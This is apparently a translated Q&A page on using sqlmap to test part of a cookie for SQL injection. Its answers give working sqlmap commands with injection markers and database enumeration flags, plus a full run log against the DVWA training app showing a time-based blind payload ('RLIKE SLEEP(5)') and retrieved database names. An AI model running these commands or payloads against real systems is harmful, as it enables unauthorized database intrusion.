如何使用sqlmap注入一部分cookie
Posted
技术标签:
【中文标题】如何使用sqlmap注入一部分cookie【英文标题】:How to inject a part of cookie using sqlmap 【发布时间】:2014-08-13 13:09:33 【问题描述】:我需要使用sqlmap 对部分cookie 进行SQL 注入。目标URL 是静态的。
一个示例 cookie:
Cookie1=blah_var1/blah_val1/blah_var2/blah_val2/searchtext/userinput/blah_var3/blah_val3/.../
在这个 cookie 中,我需要使用 sqlmap 注入“用户输入”。我知道 --cookie 参数,但在这种情况下它不起作用。这就像 cookie 的一部分必须使用 sqlmap 注入。
我不知道该怎么做。请帮忙。
【问题讨论】:
【参考方案1】:拦截所有请求,将其保存到一个文件中,然后用 -r 参数将该文件交给 sqlmap,默认情况下 sqlmap 应该检查 cookie。
sqlmap.py -r request.txt
您可以使用篡改数据(firefox 扩展)或免费版本的 burp 代理来拦截请求。
【讨论】:
感谢您的回复。我知道用 burp 套件拦截将其保存到文本文件并使用它发送发布请求。如果我们这样做,sqlmap 将在请求和 cookie 中注入所有参数。但我需要注入一部分 cookie。请帮忙。 你可以使用"*" write * 到你想测试的参数。您也可以使用 -p 指定参数 嗨,cookie 有许多变量名称和值对。其中之一就是这个“/searchtext/userinput/”。这是 cookie 的一部分。如何在其中添加“*”?请帮忙。 你能粘贴cookie吗?你可以屏蔽值 这是 cookie 值 -STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext* 我在搜索值中添加了 * 但它不起作用。【参考方案2】:
试试这样的:
sqlmap.py -u localhost/vulnerable --cookie="STATE_COOKIE=%2F1%2F_VMD%2F1%26_REQS%2F_RVID%2FCriteriaResourceFilter%2F_TIME%2F1403689244638%2F_ORVID%2FPassTrixMain%2FSEARCH_COLUMN%2FRESOURCENAME%2FSEARCH_VALUE%2Fsearchtext*"
【讨论】:
【参考方案3】:我在 Cookie 中注入 SQL 时遇到了同样的问题,我查看了它的帮助和它的代码,现在终于有点意思了,让我提出我的假设:
-
Cookie 基础注入仅适用于
level>=2。
您需要指定param-filter='COOKIE'。
不要让 sqlmap 在请求时尝试 URI 注入,否则会因执行基于 GET/POST 的测试而失败。
如果您在该可测试 cookie 上指定 自定义注入标记,请不要继续这样做,否则它将失败。
我没有在第 3 点和第 4 点尝试这么多组合,请随意将它们无效。好吧,试试这样的:
sqlmap -u 'protocol://test.server/test_url/' --cookie='id=*; phpSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
基于 cookie 的测试所需的选项有:-u、--cookie、-p、--param-filter ,--级别。
在 SQLMap 版本上尝试的命令:1.4.8#stable
输出:
$ sqlmap -u 'http://dvwa.local/vulnerabilities/sqli_blind/' --cookie='id=*; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high' -p 'id' --param-filter='COOKIE' --skip='PHPSESSID,security' --flush-session --fresh-queries --proxy='https://localhost:7777' --dbs --dbms='mysql' --os='linux' --ignore-code=404 --output-dir=./sqlmapdir/ --level=2
___
__H__
___ ___[']_____ ___ ___ 1.4.8#stable
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 01:18:36 /2020-08-31/
[01:18:36] [WARNING] using '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir' as the output directory
[01:18:36] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site_com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[01:18:39] [INFO] testing connection to the target URL
[01:18:40] [INFO] testing if the target URL content is stable
[01:18:43] [INFO] target URL content is stable
do you want to URL encode cookie values (implementation specific)? [Y/n] y
[01:19:01] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[01:19:02] [INFO] testing for SQL injection on Cookie parameter 'id'
[01:19:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:19:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[01:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[01:19:15] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[01:19:17] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[01:19:17] [INFO] testing 'Generic inline queries'
[01:19:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[01:19:22] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[01:19:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:26] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:19:31] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[01:19:32] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[01:19:47] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[01:19:47] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[01:19:50] [INFO] testing 'MySQL inline queries'
[01:19:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[01:19:52] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:19:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:20:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[01:20:33] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[01:21:28] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] n
[01:23:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:23:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:23:47] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[01:24:08] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1')
[01:24:08] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[01:24:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:24:27] [INFO] testing 'MySQL UNION query (65) - 21 to 40 columns'
[01:24:36] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: id=*' RLIKE SLEEP(5) AND 'EZrr'='EZrr; PHPSESSID=jh3c0eqqu03mlcvjh1ddjj1spr; security=high
---
[01:50:27] [INFO] the back-end DBMS is MySQL
[01:50:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[01:50:52] [INFO] fetching database names
[01:50:52] [INFO] fetching number of databases
[01:50:52] [INFO] retrieved: 2
[01:51:42] [INFO] retrieved: information_schema
[02:16:58] [INFO] retrieved: dvwa
available databases [2]:
[*] dvwa
[*] information_schema
[02:22:32] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 414 times
[02:22:32] [INFO] fetched data logged to text files under '/home/dinesh/Documents/work/workspaces/git_temp_projs/dvwa/SQL_Injection_Blind/sqlmapdir/dvwa.local'
[*] ending @ 02:22:32 /2020-08-31/
【讨论】:
【参考方案4】:这将测试cookie中的参数auth:
sqlmap -u "website" --cookie='auth=blabla; uuid=blabla' -p auth --level=2
Level 必须至少为 2。这不是指定要测试的参数的唯一方法,您还可以使用 * 指定注入点。
sqlmap -u "website" --cookie='auth=blabla; uuid=*' --level=2
【讨论】:
以上是关于如何使用sqlmap注入一部分cookie的主要内容,如果未能解决你的问题,请参考以下文章